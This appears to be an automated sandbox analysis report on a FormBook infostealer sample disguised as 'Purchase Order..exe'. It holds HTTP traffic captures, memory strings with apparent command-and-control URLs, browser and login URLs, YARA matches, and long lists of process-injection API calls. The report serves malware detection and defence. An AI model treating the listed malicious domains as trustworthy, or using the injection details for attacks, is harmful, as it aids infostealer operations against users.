                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzkmMgX7hAH%2Bm97loqvHeP1p7yz8GLRvkDCNE05aZQTHntbGzyR%2BESEFFyaFuZZfjTV6d6lf6zECd4zGLpL7JWr6h0XtSLMaZLDqa8tRB5R5G6aGENbEQsktyVynRToLzbu0BQ4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4baff950f85-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNkww1UWROTOo%2Blk68FSR2qThOGbuDk3tnMRoTBKFOaWoUavcohUuXGztV3L3iD%2BUCZGOLEAnJPRrEzTKTPX%2BbfMiNkN1yuZ2sYsuak2ZU%2FnZN%2Fd8Dp7ob2ZxhZLH74DkE7Gb6s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4cb4f618cba-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1830&rtt_var=915&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XCy3YQYA1lfXqxnAMS6BJLEGhc3jGG9HfPFvCd36ZKeHtkpuZtjhxdcDDkztvLEZD6r5V76EqbhNjtqfFMJgth2dkOG%2B479QCq2ZDYiI4YKve14s%2BVDgul%2FMlyyeY7eche%2FLiNs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4dc9e8842b2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1668&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzkl7NWsk3UkFgzvkz7zTOa5hmLHq1FEv0tp1hnubdSblP2mwWu7%2BNXZ4Y%2BL019cEAmk84zMgcWIH1X31hOknhpCoGKlqloK40VblXVWemRygVvXV0bKPqpYcuQnYsei%2Fi4lMe8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4eea9a32363-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome fri
                Source: isoburn.exe, 00000006.00000002.2663245910.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2130259016.000000003C42C000.00000004.80000000.00040000.00000000.sdmp, Purchase Order..exeString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2661409354.00000000027A5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goldstarfootwear.shop
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2661409354.00000000027A5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goldstarfootwear.shop/8m07/
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003418000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 00000006.00000003.2019441917.0000000007BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 00000006.00000003.2020891893.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 00000006.00000002.2663245910.0000000005426000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003286000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Purchase Order..exe
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0042C663 NtClose,3_2_0042C663
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2B60 NtClose,LdrInitializeThunk,3_2_018A2B60
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_018A2DF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_018A2C70
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A35C0 NtCreateMutant,LdrInitializeThunk,3_2_018A35C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A4340 NtSetContextThread,3_2_018A4340
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A4650 NtSuspendThread,3_2_018A4650
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2B80 NtQueryInformationFile,3_2_018A2B80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2BA0 NtEnumerateValueKey,3_2_018A2BA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2BE0 NtQueryValueKey,3_2_018A2BE0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2BF0 NtAllocateVirtualMemory,3_2_018A2BF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2AB0 NtWaitForSingleObject,3_2_018A2AB0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2AD0 NtReadFile,3_2_018A2AD0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2AF0 NtWriteFile,3_2_018A2AF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2DB0 NtEnumerateKey,3_2_018A2DB0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2DD0 NtDelayExecution,3_2_018A2DD0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2D00 NtSetInformationFile,3_2_018A2D00
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2D10 NtMapViewOfSection,3_2_018A2D10
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2D30 NtUnmapViewOfSection,3_2_018A2D30
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2CA0 NtQueryInformationToken,3_2_018A2CA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2CC0 NtQueryVirtualMemory,3_2_018A2CC0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2CF0 NtOpenProcess,3_2_018A2CF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2C00 NtQueryInformationProcess,3_2_018A2C00
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2C60 NtCreateKey,3_2_018A2C60
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2F90 NtProtectVirtualMemory,3_2_018A2F90
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2FA0 NtQuerySection,3_2_018A2FA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2FB0 NtResumeThread,3_2_018A2FB0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2FE0 NtCreateFile,3_2_018A2FE0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2F30 NtCreateSection,3_2_018A2F30
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2F60 NtCreateProcessEx,3_2_018A2F60
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2E80 NtReadVirtualMemory,3_2_018A2E80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2EA0 NtAdjustPrivilegesToken,3_2_018A2EA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2EE0 NtQueueApcThread,3_2_018A2EE0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A2E30 NtWriteVirtualMemory,3_2_018A2E30
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A3090 NtSetValueKey,3_2_018A3090
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A3010 NtOpenDirectoryObject,3_2_018A3010
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A39B0 NtGetContextThread,3_2_018A39B0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A3D10 NtOpenProcessToken,3_2_018A3D10
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A3D70 NtOpenThread,3_2_018A3D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F4650 NtSuspendThread,LdrInitializeThunk,6_2_048F4650
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F4340 NtSetContextThread,LdrInitializeThunk,6_2_048F4340
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_048F2CA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2C60 NtCreateKey,LdrInitializeThunk,6_2_048F2C60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_048F2C70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2DD0 NtDelayExecution,LdrInitializeThunk,6_2_048F2DD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_048F2DF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_048F2D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_048F2D30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_048F2E80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_048F2EE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2FB0 NtResumeThread,LdrInitializeThunk,6_2_048F2FB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2FE0 NtCreateFile,LdrInitializeThunk,6_2_048F2FE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2F30 NtCreateSection,LdrInitializeThunk,6_2_048F2F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2AD0 NtReadFile,LdrInitializeThunk,6_2_048F2AD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2AF0 NtWriteFile,LdrInitializeThunk,6_2_048F2AF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_048F2BA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_048F2BE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_048F2BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2B60 NtClose,LdrInitializeThunk,6_2_048F2B60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F35C0 NtCreateMutant,LdrInitializeThunk,6_2_048F35C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F39B0 NtGetContextThread,LdrInitializeThunk,6_2_048F39B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2CC0 NtQueryVirtualMemory,6_2_048F2CC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2CF0 NtOpenProcess,6_2_048F2CF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2C00 NtQueryInformationProcess,6_2_048F2C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2DB0 NtEnumerateKey,6_2_048F2DB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2D00 NtSetInformationFile,6_2_048F2D00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2EA0 NtAdjustPrivilegesToken,6_2_048F2EA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2E30 NtWriteVirtualMemory,6_2_048F2E30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2F90 NtProtectVirtualMemory,6_2_048F2F90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2FA0 NtQuerySection,6_2_048F2FA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2F60 NtCreateProcessEx,6_2_048F2F60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2AB0 NtWaitForSingleObject,6_2_048F2AB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F2B80 NtQueryInformationFile,6_2_048F2B80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F3090 NtSetValueKey,6_2_048F3090
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F3010 NtOpenDirectoryObject,6_2_048F3010
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F3D10 NtOpenProcessToken,6_2_048F3D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F3D70 NtOpenThread,6_2_048F3D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_007190A0 NtCreateFile,6_2_007190A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_00719210 NtReadFile,6_2_00719210
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_00719300 NtDeleteFile,6_2_00719300
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_007193A0 NtClose,6_2_007193A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_00719510 NtAllocateVirtualMemory,6_2_00719510
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 0_2_0166DF140_2_0166DF14
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004185833_2_00418583
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004030403_2_00403040
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004010003_2_00401000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0040E1083_2_0040E108
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0040E1133_2_0040E113
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004012703_2_00401270
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004022A53_2_004022A5
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004022B03_2_004022B0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00402B213_2_00402B21
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00402B303_2_00402B30
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0040242E3_2_0040242E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004024303_2_00402430
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0042ECA33_2_0042ECA3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0040FDAB3_2_0040FDAB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0040FDB33_2_0040FDB3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004027103_2_00402710
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0040DFC33_2_0040DFC3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0040FFD33_2_0040FFD3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004167933_2_00416793
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019241A23_2_019241A2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019301AA3_2_019301AA
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019281CC3_2_019281CC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018601003_2_01860100
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190A1183_2_0190A118
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F81583_2_018F8158
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019020003_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019303E63_2_019303E6
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E3F03_2_0187E3F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192A3523_2_0192A352
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F02C03_2_018F02C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019102743_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019305913_2_01930591
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018705353_2_01870535
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191E4F63_2_0191E4F6
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019144203_2_01914420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019224463_2_01922446
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186C7C03_2_0186C7C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018947503_2_01894750
